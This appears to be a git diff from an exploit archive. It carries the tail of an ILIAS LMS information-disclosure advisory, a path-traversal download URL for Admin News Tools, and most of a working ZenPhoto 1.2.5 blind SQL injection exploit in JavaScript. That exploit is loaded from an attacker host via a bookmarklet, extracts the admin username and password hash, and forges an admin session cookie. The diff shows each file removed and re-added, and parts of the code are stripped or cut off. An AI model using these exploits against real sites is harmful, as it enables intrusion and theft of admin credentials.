- - -User (victim) trusts in these links (He posts them) - - - -############ -//////////// - -VIDEOS DEMO - -//////////// -############ - - - -ARBITRARY INFORMATION DISCLOSURE AND EDITION ("FAVORITES") --> http://www.youtube.com/watch?v=i6D6UVR0358 - -ARBITRARY INFORMATION DISCLOSURE ("POST-ITS") --> http://www.youtube.com/watch?v=eSPp1dswe1E - - - -#################### -//////////////////// - -DISCLOSURE TIMELINE - -//////////////////// -#################### - - - - -**2009-06-28** ~~~~~> FIRST VULNS DISCOVERED - -**2009-06-29** ~~~~~> VULN REPORTED TO VENDOR - -**2009-06-29** ~~~~~> OTHER SECURITY ISSUE DISCOVERED - -**2009-06-29** ~~~~~> VULN REPORTED TO VENDOR WITH VIDEO AND REPORT - -**2009-06-30** ~~~~~> VENDOR RESPONSED - -**2009-06-30** ~~~~~> VENDOR CONFIRMED SECURITY ISSUES - -**2009-06-30** ~~~~~> VENDOR FIXED SECURITY ISSUES IN SVN FOR 3.9/3.10/Trunk (AND CONFIRMS 3.9 AFFECTED) - -**2009-06-30** ~~~~~> VENDOR CLARIFIED SECURITY ISSUES: "Confirm that all your exploits work in the latest published official release" - -**2009-07-01** ~~~~~> VENDOR CONFIRMED NEXT RELEASE WILL CONTAIN THE FIXES - -**2009-07-01** ~~~~~> I WILL WAIT NEXT RELEASE FOR FULL DISCLOSURE - -**2009-07-08** ~~~~~> ILIAS LAUNCHED NEW STABLE RELEASE (3.10.8 / 3.9.10) - -**2009-07-11** ~~~~~> I CONTACTED AGAIN TO SAY A DISCLOSURE DATE, STABLISHED FOR 2009-07-15 (WAIT ONE WEEK AFTER NEW RELEASE...) - -**2009-07-12** ~~~~~> ILIAS AGREE WITH THIS DATE AND POSTED A LINK FOR CREDITS - -**2009-07-15** ~~~~~> FULL DISCLOSURE...PUBLISHED ADVISORY. - - - - -<<<-----------------------------EOF---------------------------------->>>ENJOY IT! - - - - -############################################################################## -############################################################################## -##**************************************************************************## -## SPECIAL THANKS TO: MILW0RM FOREVER!!...STR0KE THE BEST! 
## -##**************************************************************************## -##--------------------------------------------------------------------------## -##**************************************************************************## -## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## -##**************************************************************************## -############################################################################## -############################################################################## - -# milw0rm.com [2009-07-15] +*********************************************************************************************** +*********************************************************************************************** +** ** +** ** +** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** +** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** +** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** +** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ +**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- +** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ + [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** +** ** +** ** +** ME VOY A LA PLAYA!...QUE CALOoOoOoR!...Lo0oL ** +** Ä„PROUD TO BE SPANISH! 
** +** ** +*********************************************************************************************** +*********************************************************************************************** + +---------------------------------------------------------------------------------------------- +| MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION | +|--------------------------------------------------------------------------------------------| +| | ILIAS LMS <= 3.10.7/3.9.9 | | +| CMS INFORMATION: ----------------------------------- | +| | +|-->WEB: http://www.ilias.de/ | +|-->DOWNLOAD: http://www.ilias.de/docu/goto.php?target=st_229_35&client_id=docu | +|-->DEMO: http://www.demo.ilias-support.com/ | +|-->CATEGORY: LMS/Education | +|-->DESCRIPTION: ILIAS is a powerful web-based learning management system that allows you | +| to easily manage learning resources in an integrated system. | +|-->RELEASED: 2009-06-22 | +| | +| CMS VULNERABILITY: | +| | +|-->TESTED ON: firefox 3 | +|-->DORK: "powered by ILIAS" | +|-->CATEGORY: ARBITRARY INFORMATION EDITION/DISCLOSURE | +|-->AFFECT VERSION: 3.10.7/3.9.9 | +|-->Discovered Bug date: 2009-06-28 | +|-->Reported Bug date: 2009-06-28 | +|-->Fixed bug date: 2009-06-30 | +|-->Info patch (3.10.8/3.9.10): http://www.ilias.de/docu/goto.php?target=st_229_35 | +| &client_id=docu | +|-->Author: YEnH4ckEr | +|-->mail: y3nh4ck3r[at]gmail[dot]com | +|-->WEB/BLOG: N/A | +|-->COMMENT: YEnH4ckEr <--<3--> Marijose. | +| I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! 
^_^ | +---------------------------------------------------------------------------------------------- + + + +<<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>> + + + +I used my own account in my university...sorry for testing :P + + + +################################# +///////////////////////////////// + +ARBITRARY INFORMATION DISCLOSURE + +///////////////////////////////// +################################# + + + +------------------- +------------------- + +"POST-ITS" ISSUE: + +------------------- +------------------- + + + +When a user, teacher, admin, alumn, post a new post-its, +he could read all post-its in database. + +The vuln link would be: + +http://[HOST]/[PATH]/ilias.php?col_side=right&block_type=pdnotes&rel_obj=0¬e_id=1¬e_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI + + +Changing note_id=1 for other value, for ex. 100, we could +read this posts-it. + +That seems a low risk vuln but, when i tested on-line, ie, +against my university and i've got a lot of sensitive information. + + + +------------------- +------------------- + +"CMD" ISSUE: + +------------------- +------------------- + + + +Course/group/... calendars: + +This would be a normal link: + + +http://[HOST]/[PATH]/repository.php?cmd=frameset&ref_id=50438 + + +But if I change cmd=frameset for cmd=edit: + + +http://[HOST]/[PATH]/repository.php?ref_id=50438&cmd=edit + + +I access to information about this group/course/..., and I tried to +change it, but i got permission denied...anyway, i +can get how it's configured this group/course/... + + + +------------------- +------------------- + +"CALENDAR" ISSUE: + +------------------- +------------------- + + + +http://[HOST]/[PATH]/ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI + + +Changing category_id, it shows sensitive information about +any course/group/... 
+ +Personal and global calendars are secure. + + + +######################################### +///////////////////////////////////////// + +ARBITRARY INFORMATION DISCLOSURE/EDITION + +///////////////////////////////////////// +######################################### + + + +This module (favorite) allows to get a repository of favorite links + + + +------------------- +------------------- + +"FAVORITE" ISSUE: + +------------------- +------------------- + + +This would be the vuln link: + + +http://[HOST]/[PATH]/ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI + + +GET var 'obj_id' is the vuln var...changing for other value you can view and edit any favorite link. + + +User (victim) trusts in these links (He posts them) + + + +############ +//////////// + +VIDEOS DEMO + +//////////// +############ + + + +ARBITRARY INFORMATION DISCLOSURE AND EDITION ("FAVORITES") --> http://www.youtube.com/watch?v=i6D6UVR0358 + +ARBITRARY INFORMATION DISCLOSURE ("POST-ITS") --> http://www.youtube.com/watch?v=eSPp1dswe1E + + + +#################### +//////////////////// + +DISCLOSURE TIMELINE + +//////////////////// +#################### + + + + +**2009-06-28** ~~~~~> FIRST VULNS DISCOVERED + +**2009-06-29** ~~~~~> VULN REPORTED TO VENDOR + +**2009-06-29** ~~~~~> OTHER SECURITY ISSUE DISCOVERED + +**2009-06-29** ~~~~~> VULN REPORTED TO VENDOR WITH VIDEO AND REPORT + +**2009-06-30** ~~~~~> VENDOR RESPONSED + +**2009-06-30** ~~~~~> VENDOR CONFIRMED SECURITY ISSUES + +**2009-06-30** ~~~~~> VENDOR FIXED SECURITY ISSUES IN SVN FOR 3.9/3.10/Trunk (AND CONFIRMS 3.9 AFFECTED) + +**2009-06-30** ~~~~~> VENDOR CLARIFIED SECURITY ISSUES: "Confirm that all your exploits work in the latest published official release" + +**2009-07-01** ~~~~~> VENDOR CONFIRMED NEXT RELEASE WILL CONTAIN THE FIXES + +**2009-07-01** ~~~~~> I WILL WAIT NEXT RELEASE FOR FULL DISCLOSURE + +**2009-07-08** ~~~~~> ILIAS LAUNCHED NEW STABLE RELEASE 
(3.10.8 / 3.9.10) + +**2009-07-11** ~~~~~> I CONTACTED AGAIN TO SAY A DISCLOSURE DATE, STABLISHED FOR 2009-07-15 (WAIT ONE WEEK AFTER NEW RELEASE...) + +**2009-07-12** ~~~~~> ILIAS AGREE WITH THIS DATE AND POSTED A LINK FOR CREDITS + +**2009-07-15** ~~~~~> FULL DISCLOSURE...PUBLISHED ADVISORY. + + + + +<<<-----------------------------EOF---------------------------------->>>ENJOY IT! + + + + +############################################################################## +############################################################################## +##**************************************************************************## +## SPECIAL THANKS TO: MILW0RM FOREVER!!...STR0KE THE BEST! ## +##**************************************************************************## +##--------------------------------------------------------------------------## +##**************************************************************************## +## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## +##**************************************************************************## +############################################################################## +############################################################################## + +# milw0rm.com [2009-07-15] diff --git a/platforms/php/webapps/9153.txt b/platforms/php/webapps/9153.txt index c7bbc6b58..6b33683be 100755 --- a/platforms/php/webapps/9153.txt +++ b/platforms/php/webapps/9153.txt 
@@ -1,27 +1,27 @@
-######################### Securitylab.ir ########################
-# Application Info:
-# Name: Admin News Tools
-# Version: 2.5
-# Website: http://www.adminnewstools.fr.nf
-# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
-#################################################################
-# Discoverd By: Securitylab.ir
-# Website: http://securitylab.ir
-# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
-#################################################################
-# Vulnerability Info:
-# Type: Remote File Download Vulnerability
-# Risk: Medium
-#===========================================================
-# Download.php
-# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
-# readfile($_GET['fichier']);
-# }
-#
-# http://www.site.com/news/system/download.php?fichier=./../up.php
-#===========================================================
-#################################################################
-# Securitylab Security Research Team
-###################################################################
-
-# milw0rm.com [2009-07-15]
+######################### Securitylab.ir ########################
+# Application Info:
+# Name: Admin News Tools
+# Version: 2.5
+# Website: http://www.adminnewstools.fr.nf
+# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
+#################################################################
+# Discoverd By: Securitylab.ir
+# Website: http://securitylab.ir
+# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
+#################################################################
+# Vulnerability Info:
+# Type: Remote File Download Vulnerability
+# Risk: Medium
+#===========================================================
+# Download.php
+# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
+# readfile($_GET['fichier']);
+# }
+#
+# http://www.site.com/news/system/download.php?fichier=./../up.php
+#===========================================================
+#################################################################
+# Securitylab Security Research Team
+###################################################################
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/php/webapps/9154.js b/platforms/php/webapps/9154.js
index 48b6a1bb0..236482b1f 100755
--- a/platforms/php/webapps/9154.js
+++ b/platforms/php/webapps/9154.js
@@ -1,588 +1,588 @@ -/* - * ZenPhoto 1.2.5 Completly Blind SQL Injection Exploit - * Requirements: magic_quotes = ANY (zenpage disables it anyway), ZenPage needs to be activated and have at least one news category - * - * What does this exploit let you do: - * The precoded functions I provided will allow you to extract the username and password hash of the admin from the database. - * It will also let you login to the admin panel w/o actually knowing the plain text password (only the username and hash are required) - * - * How To Use: - * 1) upload this script to http://attacker/exploit.js - * 2) open a vulnerable category in your webbrowser (Example: http://victim/zenphoto/news/category/anycategorynamehere) - * 3) Enter the following code into your address bar: - * javascript:(function(){var url = "http://attacker/exploit.js"; var evil = document.createElement('script'); evil.src = url; document.body.appendChild(evil);})(); - * 4) Press enter and wait for the exploit console to show - * 5) You may now extract the username/password hash from the database (buggy :( ) - * 6) Use the username/password hash with the Login Emulation tool to login to the admin panel - * 7) Have fun :) - * - * WARNING: THIS IS BUGGY! You might not get the hash/username correct the first time. Play with the settings below to tweak it so it works better for you - * - * Why this works: - * The sanitize function doesn't escape single quotes... - * - * Vulnerable Code (index.php): - * 95: $catname = sanitize($_GET['category']); - * 96: query("UPDATE ".prefix('zenpage_news_categories')." 
SET `hitcounter` = `hitcounter`+1 WHERE `cat_link` = '".$catname."'",true); - * - * Patch: - * 95: $catname = mysql_real_escape_string($_GET['category']); - * - * Example Exploitation: - * /zenphoto/news/category/cat1' and hitcounter = (SELECT IF(SUBSTRING(password,1 ,1) = 'A',BENCHMARK(5000000,ENCODE('this will probably','waste some time')),null) FROM zp_administrators) and '1' = '1 - * - * This payload will delay the page from loading for about 5 seconds if the first letter of the password hash is 'A' - * - * The time detection isn't perfect and was pretty much slapped together. Make sure you try editing the variables below or - * make your own injector :P - * - * Discovered and Coded by petros@dusecurity.com - * Shoutz to xplorer and the rest of the DuSec Team - */ - - -// Change this if you are having problems with the injection -var patience = .8; // Time in seconds on how patient we are. Will be substracted from the benchmark time -var max_retries = 3; // maximum retries after failed HTTP request -var charset_hash = "0123456789abcdef".split(''); // charset for the password hash -var charset_username = "abcdefghiklmnopqrstuvqxzy0123456789ABCEDFGHIJKLMNOPQRSTUVWXYZ ._".split(''); // charset for the username -var username_max = 64; // max length of the username -var hash_max = 32; // max length of password hash (its md5..i wouldnt change this) -var benchmark_code = "BENCHMARK(5850000,ENCODE('this will probably','waste some time'))"; // code used to slow down requests if the query is true -var show_timing = false; // whether or not to show the timings of each request (good for debugging) -var delay = 1500; // delay in miliseconds between request -var err_delay = 1000; //delay in miliseconds to wait after an error - - -// Dont edit below this line -var display = false; -var display_loot = false; -var loot = false; -var loot_username = false; -var loot_password = false; - -function get(page) // returns how long it took to send/receive the request... 
-{ - var xhr = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest(); - - xhr.open('GET', page, false); // keep it syncronized.. - xhr.setRequestHeader( "If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT" ); // cache.. - var seconds = getTime(); - xhr.send(null); - seconds = getTime() - seconds; - var success = (xhr.readyState == 4 && xhr.status == 200); - xhr = null; // dispose - return { 'miliseconds': seconds, 'seconds': seconds / 1000, 'success': success }; - -} -function getTime() -{ - return Math.round(new Date().getTime()); -} -function createDisplay() // create the display div -{ - var div = document.createElement("DIV"); - div.style.backgroundColor = '#C3FFB9'; - div.style.border = '2px dashed green'; - div.style.margin = '3px'; - div.style.paddingLeft = '10px'; - div.style.paddingBottom = '10px'; - - div.innerHTML = '

    ZenPhoto Blind Injection -- petros@dusecurity


    '; - display = document.createElement("P"); - - document.body.insertBefore(div, document.body.childNodes[0]); - div.appendChild(display); -} - -function write(text) -{ - display.innerHTML += text + "
    "; -} - -function setDisplay(text) -{ - display.innerHTML = text; -} - -function clearDisplay() -{ - display.innerHTML = ''; -} -function getPath() -{ - return window.location.pathname; -} - -function showMenu() -{ - clearDisplay(); - write('What you like to do?'); - var ul = document.createElement('OL'); // changed to OL so they know to do it in steps - createListItem('Extract Admin Username', 'extractusername();',ul); - createListItem('Extract Admin Password','extractpassword();',ul); - createListItem('Login to Admin using Hash', 'adminlogin();', ul); - display.appendChild(ul); -} -var un; -var pw; -function adminlogin() -{ - clearDisplay(); - write("Admin Login Emulator: "); - un = createTextbox('Username: ', (loot_username) ? loot_username : '[Enter Username]'); - pw = createTextbox('Password: ', (loot_password) ? loot_password: '[Enter Hash]'); - createButton('Pwn!', "step2();"); - write('
    Back To Menu'); - -} -function step2() -{ - var username = un.value; - var password = pw.value; - var auth =MD5(username + password); - SetCookie('zenphoto_auth', MD5(username + password), 30); - clearDisplay(); - write("Generated auth cookie: zenphoto_auth=" + auth); - write("You are now logged in with admin privileges :)"); - write('Enter Admin Panel'); - write('
    Back To Menu'); - -} -function createTextbox(label, value) -{ - display.innerHTML += "" + label + ""; - var tb = document.createElement('input'); - tb.type = 'text'; - tb.value = value; - display.appendChild(tb); - write(''); - return tb; - -} -function createButton(text, click) -{ - write(""); - -} -function addEvent(elem, type, handle) -{ - if (elem.addEventListener) - elem.addEventListener(type, handle, false); - else if (elem.attachEvent) - elem.attachEvent("on" + type, handle); -} -// borrowed function -function SetCookie(cookieName,cookieValue,nDays) { - var today = new Date(); - var expire = new Date(); - if (nDays==null || nDays==0) nDays=1; - expire.setTime(today.getTime() + 3600000*24*nDays); - document.cookie = cookieName+"="+escape(cookieValue) - + ";expires="+expire.toGMTString() + ";path=../../"; -} - -function extractusername() -{ - clearDisplay(); - var path = getPath(); - var basetime = 0; - var benchmark = 0; - var diff = 0; - var offset = 0; - var charset_len = charset_username.length; - var resp = false; - loot = ''; - display_loot = false; - write("Extracting username.."); - write("Using path: " + path); - - resp = get(path); - if(!resp.success) { write("Failed to request page."); return; } - basetime = resp.miliseconds; - write("Normal request time set to " + basetime + " milisecond(s)"); - resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1"); - benchmark = resp.miliseconds; - diff = benchmark - basetime; - if(diff <= (patience * 1000)){ alert("Error calculating request difference! Try again later."); showMenu();} - write("Benchmark request time set to " + benchmark + " milisecond(s)"); - if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;} - write("Username:
    "); - display_loot = document.getElementById('loot'); - var retries = 0; - var min = diff - (patience * 1000); - var best_match = 0; - var best = ''; - if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;} - function readNextChar() - { - var c = charset_username[offset]; - display_loot.innerHTML = ''; - display_loot.innerHTML += loot + c; - - resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(user,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1"); - if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;} - retries = 0; //reset error counter - var took = resp.miliseconds - basetime; //difference - - if(took > 0 && best_match < took) {best_match = took; best = c;} - if(show_timing) - write(loot.length + 1 + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min); - if(took >= min) - { - loot += c; - if(show_timing) - write("got \"" + loot + "\" so far..."); - display_loot.innerHTML = ''; - display_loot.innerHTML += loot; - best = ''; - best_match = 0; - offset = 0; - } - else - offset++; - - if(loot.length >= username_max) - { - display_loot.innerHTML = ''; display_loot += loot; - loot_username = loot; - write('Back To Menu'); - alert("Admin Username is \"" + loot + "\"\r\n(reached max length)"); - return; - } - if(offset < charset_len) - setTimeout(readNextChar, delay); - else - { - if(loot.length < username_max) - { - write("best match: " + best_match); - function beAnAsshole(){ - loot += best; - best = ''; best_match = 0; - display_loot.innerHTML = ''; - display_loot.innerHTML += loot; - offset = 0; - setTimeout(readNextChar, delay); - return;} - } - display_loot.innerHTML = ''; - display_loot.innerHTML += loot; - loot_username = loot; - write('Back To Menu'); - - alert("Admin Username is \"" + loot + "\""); - } - } - 
readNextChar(); - } - -function extractpassword() -{ - clearDisplay(); - var path = getPath(); - var basetime = 0; - var benchmark = 0; - var diff = 0; - var offset = 0; - var charset_len = charset_hash.length; - var resp = false; - loot = ''; - display_loot = false; - write("Extracting password.."); - write("Using path: " + path); - - resp = get(path); - if(!resp.success) { write("Failed to request page."); return; } - basetime = resp.miliseconds; - write("Normal request time set to " + basetime + " milisecond(s)"); - resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1"); - benchmark = resp.miliseconds; - write("Benchmark request time set to " + benchmark + " milisecond(s)"); - if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;} - write("Password:
    "); - display_loot = document.getElementById('loot'); - var retries = 0; - diff = benchmark - basetime; - if(diff <= 0) { alert("Failed to determine difference. Try again later"); showMenu(); return;} - var min = diff- (patience * 1000); - var best_match = 0; - var best = ''; - if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;} - function readNextChar() - { - var c = charset_hash[offset]; - display_loot.innerHTML = ''; - display_loot.innerHTML += loot + c; - - resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(password,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1"); - if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;} - var took = resp.miliseconds - basetime; - retries = 0; - if(took > 0 && took > best_match) {best_match = took; best = c;} - if(show_timing) - write(loot.length + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min); - if(took >= min) - { - loot += c; - display_loot.innerHTML = ''; - display_loot.innerHTML += loot; - offset = 0; - best = ''; best_match = 0; - } - else - offset++; - if(loot.length >= hash_max) - { - display_loot.innerHTML = ''; display_loot += loot; - loot_password = loot; - write('Back To Menu'); - alert("Admin Password Hash is \"" + loot + "\"\r\n(reached max length)"); - return; - } - if(offset < charset_len) - setTimeout(readNextChar, delay); - else - { - if(loot.length < hash_max) - { - loot += best; - best = ''; best_match = 0; - display_loot.innerHTML = ''; - display_loot.innerHTML += loot; - offset = 0; - setTimeout(readNextChar, delay); - return; - } - display_loot.innerHTML = ''; - display_loot.innerHTML += loot; - loot_password = loot; - write('Back To Menu'); - alert("Admin Password Hash is \"" + loot + "\""); - } - } - readNextChar(); - } - - -function 
createListItem(label, onclick, list) -{ - var li = document.createElement("LI"); - li.innerHTML = '' + label + ""; - list.appendChild(li); - -} - -createDisplay(); -showMenu(); - - -/** -* -* MD5 (Message-Digest Algorithm) -* http://www.webtoolkit.info/ -* -**/ - -var MD5 = function (string) { - - function RotateLeft(lValue, iShiftBits) { - return (lValue<>>(32-iShiftBits)); - } - - function AddUnsigned(lX,lY) { - var lX4,lY4,lX8,lY8,lResult; - lX8 = (lX & 0x80000000); - lY8 = (lY & 0x80000000); - lX4 = (lX & 0x40000000); - lY4 = (lY & 0x40000000); - lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF); - if (lX4 & lY4) { - return (lResult ^ 0x80000000 ^ lX8 ^ lY8); - } - if (lX4 | lY4) { - if (lResult & 0x40000000) { - return (lResult ^ 0xC0000000 ^ lX8 ^ lY8); - } else { - return (lResult ^ 0x40000000 ^ lX8 ^ lY8); - } - } else { - return (lResult ^ lX8 ^ lY8); - } - } - - function F(x,y,z) { return (x & y) | ((~x) & z); } - function G(x,y,z) { return (x & z) | (y & (~z)); } - function H(x,y,z) { return (x ^ y ^ z); } - function I(x,y,z) { return (y ^ (x | (~z))); } - - function FF(a,b,c,d,x,s,ac) { - a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac)); - return AddUnsigned(RotateLeft(a, s), b); - }; - - function GG(a,b,c,d,x,s,ac) { - a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac)); - return AddUnsigned(RotateLeft(a, s), b); - }; - - function HH(a,b,c,d,x,s,ac) { - a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac)); - return AddUnsigned(RotateLeft(a, s), b); - }; - - function II(a,b,c,d,x,s,ac) { - a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac)); - return AddUnsigned(RotateLeft(a, s), b); - }; - - function ConvertToWordArray(string) { - var lWordCount; - var lMessageLength = string.length; - var lNumberOfWords_temp1=lMessageLength + 8; - var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64; - var lNumberOfWords = (lNumberOfWords_temp2+1)*16; - var lWordArray=Array(lNumberOfWords-1); - 
var lBytePosition = 0; - var lByteCount = 0; - while ( lByteCount < lMessageLength ) { - lWordCount = (lByteCount-(lByteCount % 4))/4; - lBytePosition = (lByteCount % 4)*8; - lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<>>29; - return lWordArray; - }; - - function WordToHex(lValue) { - var WordToHexValue="",WordToHexValue_temp="",lByte,lCount; - for (lCount = 0;lCount<=3;lCount++) { - lByte = (lValue>>>(lCount*8)) & 255; - WordToHexValue_temp = "0" + lByte.toString(16); - WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2); - } - return WordToHexValue; - }; - - function Utf8Encode(string) { - string = string.replace(/\r\n/g,"\n"); - var utftext = ""; - - for (var n = 0; n < string.length; n++) { - - var c = string.charCodeAt(n); - - if (c < 128) { - utftext += String.fromCharCode(c); - } - else if((c > 127) && (c < 2048)) { - utftext += String.fromCharCode((c >> 6) | 192); - utftext += String.fromCharCode((c & 63) | 128); - } - else { - utftext += String.fromCharCode((c >> 12) | 224); - utftext += String.fromCharCode(((c >> 6) & 63) | 128); - utftext += String.fromCharCode((c & 63) | 128); - } - - } - - return utftext; - }; - - var x=Array(); - var k,AA,BB,CC,DD,a,b,c,d; - var S11=7, S12=12, S13=17, S14=22; - var S21=5, S22=9 , S23=14, S24=20; - var S31=4, S32=11, S33=16, S34=23; - var S41=6, S42=10, S43=15, S44=21; - - string = Utf8Encode(string); - - x = ConvertToWordArray(string); - - a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476; - - for (k=0;k"; +} + +function setDisplay(text) +{ + display.innerHTML = text; +} + +function clearDisplay() +{ + display.innerHTML = ''; +} +function getPath() +{ + return window.location.pathname; +} + +function showMenu() +{ + clearDisplay(); + write('What you like to do?'); + var ul = document.createElement('OL'); // changed to OL so they know to do it in steps + createListItem('Extract Admin Username', 'extractusername();',ul); + 
createListItem('Extract Admin Password','extractpassword();',ul); + createListItem('Login to Admin using Hash', 'adminlogin();', ul); + display.appendChild(ul); +} +var un; +var pw; +function adminlogin() +{ + clearDisplay(); + write("Admin Login Emulator: "); + un = createTextbox('Username: ', (loot_username) ? loot_username : '[Enter Username]'); + pw = createTextbox('Password: ', (loot_password) ? loot_password: '[Enter Hash]'); + createButton('Pwn!', "step2();"); + write('
    Back To Menu'); + +} +function step2() +{ + var username = un.value; + var password = pw.value; + var auth =MD5(username + password); + SetCookie('zenphoto_auth', MD5(username + password), 30); + clearDisplay(); + write("Generated auth cookie: zenphoto_auth=" + auth); + write("You are now logged in with admin privileges :)"); + write('Enter Admin Panel'); + write('
    Back To Menu'); + +} +function createTextbox(label, value) +{ + display.innerHTML += "" + label + ""; + var tb = document.createElement('input'); + tb.type = 'text'; + tb.value = value; + display.appendChild(tb); + write(''); + return tb; + +} +function createButton(text, click) +{ + write(""); + +} +function addEvent(elem, type, handle) +{ + if (elem.addEventListener) + elem.addEventListener(type, handle, false); + else if (elem.attachEvent) + elem.attachEvent("on" + type, handle); +} +// borrowed function +function SetCookie(cookieName,cookieValue,nDays) { + var today = new Date(); + var expire = new Date(); + if (nDays==null || nDays==0) nDays=1; + expire.setTime(today.getTime() + 3600000*24*nDays); + document.cookie = cookieName+"="+escape(cookieValue) + + ";expires="+expire.toGMTString() + ";path=../../"; +} + +function extractusername() +{ + clearDisplay(); + var path = getPath(); + var basetime = 0; + var benchmark = 0; + var diff = 0; + var offset = 0; + var charset_len = charset_username.length; + var resp = false; + loot = ''; + display_loot = false; + write("Extracting username.."); + write("Using path: " + path); + + resp = get(path); + if(!resp.success) { write("Failed to request page."); return; } + basetime = resp.miliseconds; + write("Normal request time set to " + basetime + " milisecond(s)"); + resp = get(path + "' and hitcounter = (SELECT IF('1' = '1',"+benchmark_code+",null)) and '1' = '1"); + benchmark = resp.miliseconds; + diff = benchmark - basetime; + if(diff <= (patience * 1000)){ alert("Error calculating request difference! Try again later."); showMenu();} + write("Benchmark request time set to " + benchmark + " milisecond(s)"); + if(benchmark <= (basetime + (patience * 1000))){ write("Error: Benchmark took less time than expected. Script might be patched or magic_quotes may be enabled. Make sure you are NOT logged in a try again."); return;} + write("Username:
    "); + display_loot = document.getElementById('loot'); + var retries = 0; + var min = diff - (patience * 1000); + var best_match = 0; + var best = ''; + if(min < 0) { write("Error: Benchmark took less time than expected. Please try again later."); return;} + function readNextChar() + { + var c = charset_username[offset]; + display_loot.innerHTML = ''; + display_loot.innerHTML += loot + c; + + resp = get(path + "' and hitcounter = (SELECT IF(SUBSTRING(user,"+ (loot.length + 1)+" ,1) = '"+ c +"',"+ benchmark_code+",null) FROM zp_administrators LIMIT 0,1) and '1' = '1"); + if(!resp.success) { ++retries; if(retries >= max_retries) { write("failed to execute exploit (too many errors)"); return;} setTimeout(readNextChar, err_delay); return;} + retries = 0; //reset error counter + var took = resp.miliseconds - basetime; //difference + + if(took > 0 && best_match < took) {best_match = took; best = c;} + if(show_timing) + write(loot.length + 1 + "> "+ 'char= ' + c + ', took= ' + took + ', min= ' + min); + if(took >= min) + { + loot += c; + if(show_timing) + write("got \"" + loot + "\" so far..."); + display_loot.innerHTML = ''; + display_loot.innerHTML += loot; + best = ''; + best_match = 0; + offset = 0; + } + else + offset++; + + if(loot.length >= username_max) + { + display_loot.innerHTML = ''; display_loot += loot; + loot_username = loot; + write('Back To Menu'); + alert("Admin Username is \"" + loot + "\"\r\n(reached max length)"); + return; + } + if(offset < charset_len) + setTimeout(readNextChar, delay); + else + { + if(loot.length < username_max) + { + write("best match: " + best_match); + function beAnAsshole(){ + loot += best; + best = ''; best_match = 0; + display_loot.innerHTML = ''; + display_loot.innerHTML += loot; + offset = 0; + setTimeout(readNextChar, delay); + return;} + } + display_loot.innerHTML = ''; + display_loot.innerHTML += loot; + loot_username = loot; + write('Back To Menu'); + + alert("Admin Username is \"" + loot + "\""); + } + } + 
